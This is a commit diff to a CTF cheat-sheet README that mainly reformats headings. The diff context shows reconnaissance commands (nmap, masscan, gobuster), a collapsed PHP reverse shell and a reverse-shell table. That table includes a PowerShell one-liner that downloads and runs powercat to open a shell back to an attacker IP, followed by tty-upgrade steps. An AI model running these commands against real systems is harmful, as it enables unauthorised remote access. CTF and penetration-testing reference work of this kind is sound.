phil/CTF_CheatSheet
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Formatting

Browse Source
This commit is contained in:
Phil 2021-12-24 13:41:29 +00:00
parent 8c1ce1f35f
commit 1cdc1241dc
1 changed files with 18 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

25
README.md
View File

@ -30,14 +30,14 @@
##### Nmap #### Nmap
``` ```
nmap -sV -sC -oA nmap/basic IP nmap -sV -sC -oA nmap/basic IP
nmap [Scan Type] [Options] {target specification} nmap [Scan Type] [Options] {target specification}
``` ```
```
* HOST DISCOVERY: * HOST DISCOVERY:
- -sL: List Scan - simply list targets to scan - -sL: List Scan - simply list targets to scan
- -sn/-sP: Ping Scan - disable port scan - -sn/-sP: Ping Scan - disable port scan
@ -59,20 +59,25 @@ nmap [Scan Type] [Options] {target specification}
-v: Increase verbosity level (use -vv or more for greater effect) -v: Increase verbosity level (use -vv or more for greater effect)
* MISC: -6: Enable IPv6 scanning -A: Enable OS detection, version detection, script scanning, and traceroute * MISC: -6: Enable IPv6 scanning -A: Enable OS detection, version detection, script scanning, and traceroute
```
##### Masscan
#### Masscan
```bash ```bash
masscan IP -p 1-65535 --rate 100 -oX masscan.xml masscan IP -p 1-65535 --rate 100 -oX masscan.xml
``` ```
##### Netdiscover
#### Netdiscover
```` ````
netdiscover -i <INTERFACE> netdiscover -i <INTERFACE>
``` ```
##### DirBuster / GoBuster
#### DirBuster / GoBuster
```bash ```bash
./gobuster -u http://buffered.io/ -w /secondary/wordlists/more-lists/dirb/ -t 10 ./gobuster -u http://buffered.io/ -w /secondary/wordlists/more-lists/dirb/ -t 10
@ -91,7 +96,7 @@ netdiscover -i <INTERFACE>
### Attacking - Reverse Shells ### Attacking - Reverse Shells
* PHP Reverse Shell #### PHP Reverse Shell
``` ```
<?php <?php
@ -284,6 +289,8 @@ function printit ($string) {
?> ?>
``` ```
#### Built-in Tools
| Program | Command | | Program | Command |
|----------|---------| |----------|---------|
| Netcat Listen | ncat -vlnp 4444 | | Netcat Listen | ncat -vlnp 4444 |
@ -300,7 +307,9 @@ function printit ($string) {
| Java | java.lang.Runtime.exec()` payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html | | Java | java.lang.Runtime.exec()` payload generator: http://www.jackson-t.ca/runtime-exec-payloads.html |
| Powershell | powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 5566 -e cmd | | Powershell | powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ^IP^ -p 5566 -e cmd |
### Spawning a Shell
#### Spawning a Shell
To check if the shell is a tty shell, just enter tty command like the following. To check if the shell is a tty shell, just enter tty command like the following.
@ -339,6 +348,8 @@ fg
export TERM=xterm export TERM=xterm
``` ```
## Stage 3 - Post Exploitation ## Stage 3 - Post Exploitation
### Lets Have a Look Around ### Lets Have a Look Around